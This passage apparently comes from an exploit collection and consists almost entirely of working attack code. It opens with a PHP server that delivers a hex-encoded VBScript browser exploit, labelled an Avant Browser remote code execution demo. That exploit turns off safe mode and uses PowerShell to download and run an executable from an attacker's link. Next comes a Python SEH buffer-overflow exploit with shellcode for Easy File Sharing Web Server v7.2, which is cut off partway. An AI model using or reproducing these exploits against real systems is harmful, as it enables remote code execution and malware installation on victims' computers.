"\x3C\x68\x74\x6D\x6C\x3E\x0D\x0A\x3C\x6D\x65\x74\x61\x20\x68\x74\x74\x70\x2D\x65\x71\x75\x69\x76\x3D\x22\x58\x2D\x55\x41\x2D\x43\x6F\x6D\x70\x61\x74\x69\x62\x6C\x65\x22\x20\x63\x6F\x6E\x74\x65\x6E\x74\x3D\x22\x49\x45\x3D\x45\x6D\x75\x6C\x61\x74\x65\x49\x45\x38\x22\x20\x3E\x0D\x0A\x3C\x68\x65\x61\x64\x3E\x0D\x0A\x3C\x2F\x68\x65\x61\x64\x3E\x0D\x0A\x3C\x62\x6F\x64\x79\x3E\x0D\x0A\x20\x0D\x0A\x3C\x53\x43\x52\x49\x50\x54\x20\x4C\x41\x4E\x47\x55\x41\x47\x45\x3D\x22\x56\x42\x53\x63\x72\x69\x70\x74\x22\x3E\x0D\x0A\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x72\x75\x6E\x6D\x75\x6D\x61\x61\x28\x29\x20\x0D\x0A\x4F\x6E\x20\x45\x72\x72\x6F\x72\x20\x52\x65\x73\x75\x6D\x65\x20\x4E\x65\x78\x74\x0D\x0A\x73\x65\x74\x20\x73\x68\x65\x6C\x6C\x3D\x63\x72\x65\x61\x74\x65\x6F\x62\x6A\x65\x63\x74\x28\x22\x53\x68\x65\x6C\x6C\x2E\x41\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x22\x29\x0D\x0A\x63\x6F\x6D\x6D\x61\x6E\x64\x3D\x22\x49\x6E\x76\x6F\x6B\x65\x2D\x45\x78\x70\x72\x65\x73\x73\x69\x6F\x6E\x20\x24\x28\x4E\x65\x77\x2D\x4F\x62\x6A\x65\x63\x74\x20\x53\x79\x73\x74\x65\x6D\x2E\x4E\x65\x74\x2E\x57\x65\x62\x43\x6C\x69\x65\x6E\x74\x29\x2E\x44\x6F\x77\x6E\x6C\x6F\x61\x64\x46\x69\x6C\x65\x28\x27\x44\x4F\x57\x4E\x4C\x4F\x41\x44\x27\x2C\x27\x6C\x6F\x61\x64\x2E\x65\x78\x65\x27\x29\x3B\x24\x28\x4E\x65\x77\x2D\x4F\x62\x6A\x65\x63\x74\x20\x2D\x63\x6F\x6D\x20\x53\x68\x65\x6C\x6C\x2E\x41\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x29\x2E\x53\x68\x65\x6C\x6C\x45\x78\x65\x63\x75\x74\x65\x28\x27\x6C\x6F\x61\x64\x2E\x65\x78\x65\x27\x29\x3B\x22\x0D\x0A\x73\x68\x65\x6C\x6C\x2E\x53\x68\x65\x6C\x6C\x45\x78\x65\x63\x75\x74\x65\x20\x22\x70\x6F\x77\x65\x72\x73\x68\x65\x6C\x6C\x2E\x65\x78\x65\x22\x2C\x20\x22\x2D\x43\x6F\x6D\x6D\x61\x6E\x64\x20\x22\x20\x26\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x2C\x20\x22\x22\x2C\x20\x22\x72\x75\x6E\x61\x73\x22\x2C\x20\x30\x0D\x0A\x65\x6E\x64\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x0D\x0A\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E\x0D\x0A\x20\x0D\x0A\x3C\x53\x43\x52\x49\x50\x54\x20\x4C\x41\x4E\x47\x55\x41\x47\x45\x3D\x22\x56\x42\x53\x63\x72\x69\x70\x74\x22\x3E\x0D\x0A\x20\x20\x0D\x0A\x64\x69\x6D\x20\x20\x20\x61\x61\x28\x29\x0D\x0A\x64\x69\x6D\x20\x20\x20\x61\x62\x28\x29\x0D\x0A\x64\x69\x6D\x20\x20\x20\x61\x30\x0D\x0A\x64\x69\x6D\x20\x20\x20\x61\x31\x0D\x0A\x64\x69\x6D\x20\x20\x20\x61\x32\x0D\x0A\x64\x69\x6D\x20\x20\x20\x61\x33\x0D\x0A\x64\x69\x6D\x20\x20\x20\x77\x69\x6E\x39\x78\x0D\x0A\x64\x69\x6D\x20\x20\x20\x69\x6E\x74\x56\x65\x72\x73\x69\x6F\x6E\x0D\x0A\x64\x69\x6D\x20\x20\x20\x72\x6E\x64\x61\x0D\x0A\x64\x69\x6D\x20\x20\x20\x66\x75\x6E\x63\x6C\x61\x73\x73\x0D\x0A\x64\x69\x6D\x20\x20\x20\x6D\x79\x61\x72\x72\x61\x79\x0D\x0A\x20\x0D\x0A\x42\x65\x67\x69\x6E\x28\x29\x0D\x0A\x20\x0D\x0A\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x42\x65\x67\x69\x6E\x28\x29\x0D\x0A\x20\x20\x4F\x6E\x20\x45\x72\x72\x6F\x72\x20\x52\x65\x73\x75\x6D\x65\x20\x4E\x65\x78\x74\x0D\x0A\x20\x20\x69\x6E\x66\x6F\x3D\x4E\x61\x76\x69\x67\x61\x74\x6F\x72\x2E\x55\x73\x65\x72\x41\x67\x65\x6E\x74\x0D\x0A\x20\x0D\x0A\x20\x20\x69\x66\x28\x69\x6E\x73\x74\x72\x28\x69\x6E\x66\x6F\x2C\x22\x57\x69\x6E\x36\x34\x22\x29\x3E\x30\x29\x20\x20\x20\x74\x68\x65\x6E\x0D\x0A\x20\x20\x20\x20\x20\x65\x78\x69\x74\x20\x20\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x0D\x0A\x20\x20\x65\x6E\x64\x20\x69\x66\x0D\x0A\x20\x0D\x0A\x20\x20\x69\x66\x20\x28\x69\x6E\x73\x74\x72\x28\x69\x6E\x66\x6F\x2C\x22\x4D\x53\x49\x45\x22\x29\x3E\x30\x29\x20\x20\x20\x74\x68\x65\x6E\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6E\x74\x56\x65\x72\x73\x69\x6F\x6E\x20\x3D\x20\x43\x49\x6E\x74\x28\x4D\x69\x64\x28\x69\x6E\x66\x6F\x2C\x20\x49\x6E\x53\x74\x72\x28\x69\x6E\x66\x6F\x2C\x20\x22\x4D\x53\x49\x45\x22\x29\x20\x2B\x20\x35\x2C\x20\x32\x29\x29\x20\x20\x20\x0D\x0A\x20\x20\x65\x6C\x73\x65\x0D\x0A\x20\x20\x20\x20\x20\x65\x78\x69\x74\x20\x20\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x65\x6E\x64\x20\x69\x66\x0D\x0A\x20\x0D\x0A\x20\x20\x77\x69\x6E\x39\x78\x3D\x30\x0D\x0A\x20\x0D\x0A\x20\x20\x42\x65\x67\x69\x6E\x49\x6E\x69\x74\x28\x29\x0D\x0A\x20\x20\x49\x66\x20\x43\x72\x65\x61\x74\x65\x28\x29\x3D\x54\x72\x75\x65\x20\x54\x68\x65\x6E\x0D\x0A\x20\x20\x20\x20\x20\x6D\x79\x61\x72\x72\x61\x79\x3D\x20\x20\x20\x20\x20\x20\x20\x20\x63\x68\x72\x77\x28\x30\x31\x29\x26\x63\x68\x72\x77\x28\x32\x31\x37\x36\x29\x26\x63\x68\x72\x77\x28\x30\x31\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x0D\x0A\x20\x20\x20\x20\x20\x6D\x79\x61\x72\x72\x61\x79\x3D\x6D\x79\x61\x72\x72\x61\x79\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x33\x32\x37\x36\x37\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x30\x29\x0D\x0A\x20\x0D\x0A\x20\x20\x20\x20\x20\x69\x66\x28\x69\x6E\x74\x56\x65\x72\x73\x69\x6F\x6E\x3C\x34\x29\x20\x74\x68\x65\x6E\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x77\x72\x69\x74\x65\x28\x22\x3C\x62\x72\x3E\x20\x49\x45\x22\x29\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x77\x72\x69\x74\x65\x28\x69\x6E\x74\x56\x65\x72\x73\x69\x6F\x6E\x29\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x75\x6E\x73\x68\x65\x6C\x6C\x63\x6F\x64\x65\x28\x29\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x65\x6C\x73\x65\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x65\x74\x6E\x6F\x74\x73\x61\x66\x65\x6D\x6F\x64\x65\x28\x29\x0D\x0A\x20\x20\x20\x20\x20\x65\x6E\x64\x20\x69\x66\x0D\x0A\x20\x20\x65\x6E\x64\x20\x69\x66\x0D\x0A\x65\x6E\x64\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x0D\x0A\x20\x0D\x0A\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x42\x65\x67\x69\x6E\x49\x6E\x69\x74\x28\x29\x0D\x0A\x20\x20\x20\x52\x61\x6E\x64\x6F\x6D\x69\x7A\x65\x28\x29\x0D\x0A\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x61\x61\x28\x35\x29\x0D\x0A\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x61\x62\x28\x35\x29\x0D\x0A\x20\x20\x20\x61\x30\x3D\x31\x33\x2B\x31\x37\x2A\x72\x6E\x64\x28\x36\x29\x0D\x0A\x20\x20\x20\x61\x33\x3D\x37\x2B\x33\x2A\x72\x6E\x64\x28\x35\x29\x0D\x0A\x65\x6E\x64\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x0D\x0A\x20\x0D\x0A\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x43\x72\x65\x61\x74\x65\x28\x29\x0D\x0A\x20\x20\x4F\x6E\x20\x45\x72\x72\x6F\x72\x20\x52\x65\x73\x75\x6D\x65\x20\x4E\x65\x78\x74\x0D\x0A\x20\x20\x64\x69\x6D\x20\x69\x0D\x0A\x20\x20\x43\x72\x65\x61\x74\x65\x3D\x46\x61\x6C\x73\x65\x0D\x0A\x20\x20\x46\x6F\x72\x20\x69\x20\x3D\x20\x30\x20\x54\x6F\x20\x34\x30\x30\x0D\x0A\x20\x20\x20\x20\x49\x66\x20\x4F\x76\x65\x72\x28\x29\x3D\x54\x72\x75\x65\x20\x54\x68\x65\x6E\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x43\x72\x65\x61\x74\x65\x3D\x54\x72\x75\x65\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x45\x78\x69\x74\x20\x46\x6F\x72\x0D\x0A\x20\x20\x20\x20\x45\x6E\x64\x20\x49\x66\x20\x0D\x0A\x20\x20\x4E\x65\x78\x74\x0D\x0A\x65\x6E\x64\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x0D\x0A\x20\x0D\x0A\x73\x75\x62\x20\x74\x65\x73\x74\x61\x61\x28\x29\x0D\x0A\x65\x6E\x64\x20\x73\x75\x62\x0D\x0A\x20\x0D\x0A\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x6D\x79\x64\x61\x74\x61\x28\x29\x0D\x0A\x20\x20\x20\x20\x4F\x6E\x20\x45\x72\x72\x6F\x72\x20\x52\x65\x73\x75\x6D\x65\x20\x4E\x65\x78\x74\x0D\x0A\x20\x20\x20\x20\x20\x69\x3D\x74\x65\x73\x74\x61\x61\x0D\x0A\x20\x20\x20\x20\x20\x69\x3D\x6E\x75\x6C\x6C\x0D\x0A\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32\x29\x20\x20\x0D\x0A\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3D\x30\x0D\x0A\x20\x20\x20\x20\x20\x61\x61\x28\x61\x31\x29\x3D\x69\x0D\x0A\x20\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3D\x36\x2E\x33\x36\x35\x39\x38\x37\x33\x37\x34\x33\x37\x38\x30\x31\x45\x2D\x33\x31\x34\x0D\x0A\x20\x0D\x0A\x20\x20\x20\x20\x20\x61\x61\x28\x61\x31\x2B\x32\x29\x3D\x6D\x79\x61\x72\x72\x61\x79\x0D\x0A\x20\x20\x20\x20\x20\x61\x62\x28\x32\x29\x3D\x31\x2E\x37\x34\x30\x38\x38\x35\x33\x34\x37\x33\x31\x33\x32\x34\x45\x2D\x33\x31\x30\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x6D\x79\x64\x61\x74\x61\x3D\x61\x61\x28\x61\x31\x29\x0D\x0A\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x20\x20\x0D\x0A\x65\x6E\x64\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x0D\x0A\x20\x0D\x0A\x20\x0D\x0A\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x73\x65\x74\x6E\x6F\x74\x73\x61\x66\x65\x6D\x6F\x64\x65\x28\x29\x0D\x0A\x20\x20\x20\x20\x4F\x6E\x20\x45\x72\x72\x6F\x72\x20\x52\x65\x73\x75\x6D\x65\x20\x4E\x65\x78\x74\x0D\x0A\x20\x20\x20\x20\x69\x3D\x6D\x79\x64\x61\x74\x61\x28\x29\x20\x20\x0D\x0A\x20\x20\x20\x20\x69\x3D\x72\x75\x6D\x28\x69\x2B\x38\x29\x0D\x0A\x20\x20\x20\x20\x69\x3D\x72\x75\x6D\x28\x69\x2B\x31\x36\x29\x0D\x0A\x20\x20\x20\x20\x6A\x3D\x72\x75\x6D\x28\x69\x2B\x26\x68\x31\x33\x34\x29\x20\x20\x0D\x0A\x20\x20\x20\x20\x66\x6F\x72\x20\x6B\x3D\x30\x20\x74\x6F\x20\x26\x68\x36\x30\x20\x73\x74\x65\x70\x20\x34\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6A\x3D\x72\x75\x6D\x28\x69\x2B\x26\x68\x31\x32\x30\x2B\x6B\x29\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28\x6A\x3D\x31\x34\x29\x20\x74\x68\x65\x6E\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6A\x3D\x30\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32\x29\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x61\x61\x28\x61\x31\x2B\x32\x29\x28\x69\x2B\x26\x68\x31\x31\x63\x2B\x6B\x29\x3D\x61\x62\x28\x34\x29\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x20\x20\x0D\x0A\x20\x0D\x0A\x20\x20\x20\x20\x20\x6A\x3D\x30\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6A\x3D\x72\x75\x6D\x28\x69\x2B\x26\x68\x31\x32\x30\x2B\x6B\x29\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x45\x78\x69\x74\x20\x66\x6F\x72\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6E\x64\x20\x69\x66\x0D\x0A\x20\x0D\x0A\x20\x20\x20\x20\x6E\x65\x78\x74\x20\x0D\x0A\x20\x20\x20\x20\x61\x62\x28\x32\x29\x3D\x31\x2E\x36\x39\x37\x35\x39\x36\x36\x33\x33\x31\x36\x37\x34\x37\x45\x2D\x33\x31\x33\x0D\x0A\x20\x20\x20\x20\x72\x75\x6E\x6D\x75\x6D\x61\x61\x28\x29\x20\x0D\x0A\x65\x6E\x64\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x0D\x0A\x20\x0D\x0A\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x4F\x76\x65\x72\x28\x29\x0D\x0A\x20\x20\x20\x20\x4F\x6E\x20\x45\x72\x72\x6F\x72\x20\x52\x65\x73\x75\x6D\x65\x20\x4E\x65\x78\x74\x0D\x0A\x20\x20\x20\x20\x64\x69\x6D\x20\x74\x79\x70\x65\x31\x2C\x74\x79\x70\x65\x32\x2C\x74\x79\x70\x65\x33\x0D\x0A\x20\x20\x20\x20\x4F\x76\x65\x72\x3D\x46\x61\x6C\x73\x65\x0D\x0A\x20\x20\x20\x20\x61\x30\x3D\x61\x30\x2B\x61\x33\x0D\x0A\x20\x20\x20\x20\x61\x31\x3D\x61\x30\x2B\x32\x0D\x0A\x20\x20\x20\x20\x61\x32\x3D\x61\x30\x2B\x26\x68\x38\x30\x30\x30\x30\x30\x30\x0D\x0A\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x20\x0D\x0A\x20\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x20\x20\x61\x62\x28\x61\x30\x29\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32\x29\x0D\x0A\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x74\x79\x70\x65\x31\x3D\x31\x0D\x0A\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3D\x31\x2E\x31\x32\x33\x34\x35\x36\x37\x38\x39\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x30\x0D\x0A\x20\x20\x20\x20\x61\x61\x28\x61\x30\x29\x3D\x31\x30\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x49\x66\x28\x49\x73\x4F\x62\x6A\x65\x63\x74\x28\x61\x61\x28\x61\x31\x2D\x31\x29\x29\x20\x3D\x20\x46\x61\x6C\x73\x65\x29\x20\x54\x68\x65\x6E\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28\x69\x6E\x74\x56\x65\x72\x73\x69\x6F\x6E\x3C\x34\x29\x20\x74\x68\x65\x6E\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6D\x65\x6D\x3D\x63\x69\x6E\x74\x28\x61\x30\x2B\x31\x29\x2A\x31\x36\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6A\x3D\x76\x61\x72\x74\x79\x70\x65\x28\x61\x61\x28\x61\x31\x2D\x31\x29\x29\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28\x28\x6A\x3D\x6D\x65\x6D\x2B\x34\x29\x20\x6F\x72\x20\x28\x6A\x2A\x38\x3D\x6D\x65\x6D\x2B\x38\x29\x29\x20\x74\x68\x65\x6E\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28\x76\x61\x72\x74\x79\x70\x65\x28\x61\x61\x28\x61\x31\x2D\x31\x29\x29\x3C\x3E\x30\x29\x20\x20\x54\x68\x65\x6E\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x49\x66\x28\x49\x73\x4F\x62\x6A\x65\x63\x74\x28\x61\x61\x28\x61\x31\x29\x29\x20\x3D\x20\x46\x61\x6C\x73\x65\x20\x29\x20\x54\x68\x65\x6E\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x74\x79\x70\x65\x31\x3D\x56\x61\x72\x54\x79\x70\x65\x28\x61\x61\x28\x61\x31\x29\x29\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6E\x64\x20\x69\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6E\x64\x20\x69\x66\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6C\x73\x65\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x20\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x0D\x0A\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6E\x64\x20\x69\x66\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6C\x73\x65\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28\x76\x61\x72\x74\x79\x70\x65\x28\x61\x61\x28\x61\x31\x2D\x31\x29\x29\x3C\x3E\x30\x29\x20\x20\x54\x68\x65\x6E\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x49\x66\x28\x49\x73\x4F\x62\x6A\x65\x63\x74\x28\x61\x61\x28\x61\x31\x29\x29\x20\x3D\x20\x46\x61\x6C\x73\x65\x20\x29\x20\x54\x68\x65\x6E\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x74\x79\x70\x65\x31\x3D\x56\x61\x72\x54\x79\x70\x65\x28\x61\x61\x28\x61\x31\x29\x29\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6E\x64\x20\x69\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6E\x64\x20\x69\x66\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6E\x64\x20\x69\x66\x0D\x0A\x20\x20\x20\x20\x65\x6E\x64\x20\x69\x66\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x49\x66\x28\x74\x79\x70\x65\x31\x3D\x26\x68\x32\x66\x36\x36\x29\x20\x54\x68\x65\x6E\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x4F\x76\x65\x72\x3D\x54\x72\x75\x65\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x45\x6E\x64\x20\x49\x66\x20\x20\x0D\x0A\x20\x20\x20\x20\x49\x66\x28\x74\x79\x70\x65\x31\x3D\x26\x68\x42\x39\x41\x44\x29\x20\x54\x68\x65\x6E\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x4F\x76\x65\x72\x3D\x54\x72\x75\x65\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x77\x69\x6E\x39\x78\x3D\x31\x0D\x0A\x20\x20\x20\x20\x45\x6E\x64\x20\x49\x66\x20\x20\x0D\x0A\x20\x0D\x0A\x20\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x65\x6E\x64\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x0D\x0A\x20\x0D\x0A\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x72\x75\x6D\x28\x61\x64\x64\x29\x20\x0D\x0A\x20\x20\x20\x20\x4F\x6E\x20\x45\x72\x72\x6F\x72\x20\x52\x65\x73\x75\x6D\x65\x20\x4E\x65\x78\x74\x0D\x0A\x20\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32\x29\x20\x20\x0D\x0A\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3D\x30\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x61\x61\x28\x61\x31\x29\x3D\x61\x64\x64\x2B\x34\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3D\x31\x2E\x36\x39\x37\x35\x39\x36\x36\x33\x33\x31\x36\x37\x34\x37\x45\x2D\x33\x31\x33\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x72\x75\x6D\x3D\x6C\x65\x6E\x62\x28\x61\x61\x28\x61\x31\x29\x29\x20\x20\x0D\x0A\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3D\x30\x0D\x0A\x20\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x0D\x0A\x65\x6E\x64\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x0D\x0A\x20\x0D\x0A\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E\x0D\x0A\x20\x3C\x63\x65\x6E\x74\x65\x72\x3E\x0D\x0A\x20\x3C\x73\x74\x72\x6F\x6E\x67\x3E\x41\x76\x61\x6E\x74\x20\x42\x72\x6F\x77\x73\x65\x72\x20\x52\x65\x6D\x6F\x74\x65\x20\x43\x6F\x64\x65\x20\x45\x78\x65\x63\x75\x74\x69\x6F\x6E\x20\x44\x65\x6D\x6F\x3C\x2F\x73\x74\x72\x6F\x6E\x67\x3E\x0D\x0A\x20\x3C\x62\x72\x20\x2F\x3E\x0D\x0A\x20\x3C\x69\x3E\x45\x68\x73\x61\x6E\x20\x4E\x6F\x72\x65\x64\x64\x69\x6E\x69\x20\x2D\x20\x40\x70\x72\x6F\x74\x33\x63\x74\x30\x72\x3C\x69\x3E\x0D\x0A\x20\x3C\x62\x72\x20\x2F\x3E\x3C\x69\x3E\x65\x68\x73\x61\x6E\x6E\x2E\x69\x6E\x66\x6F\x3C\x2F\x69\x3E\x0D\x0A\x20\x3C\x2F\x63\x65\x6E\x74\x65\x72\x3E\x0D\x0A\x3C\x2F\x62\x6F\x64\x79\x3E\x0D\x0A\x3C\x2F\x68\x74\x6D\x6C\x3E"; $msgd=str_replace("DOWNLOAD",$link,$msgd); for (;;) { if ($client = @socket_accept($socket)) { socket_write($client, "HTTP/1.1 200 OK\r\n" . "Content-length: " . strlen($msgd) . "\r\n" . "Content-Type: text/html; charset=UTF-8\r\n\r\n" . $msgd); print "\n Target Checked Your Link \n"; } else usleep(100000); } ?>
  25. #!/usr/bin/env python # Easy File Sharing Web Server v7.2 Remote SEH Based Overflow # The buffer overwrites ebx with 750+ offset, when sending 4059 it overwrites the EBX # vulnerable file /changeuser.ghp > Cookies UserID=[buf] # Means there are two ways to exploit changeuser.ghp # Tested on Win7 x64 and x86, it should work on win8/win10 # By Audit0r # https://twitter.com/Audit0rSA import sys, socket, struct if len(sys.argv) <= 1: print "Usage: python efsws.py [host] [port]" exit() host = sys.argv[1] port = int(sys.argv[2]) # https://code.google.com/p/win-exec-calc-shellcode/ shellcode = ( "\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" + "\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" + "\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" + "\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" + "\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" + "\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" + "\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" + "\x1c\x39\xbd" ) print "[+]Connecting to" + host craftedreq = "A"*4059 craftedreq += "\xeb\x06\x90\x90" # basic 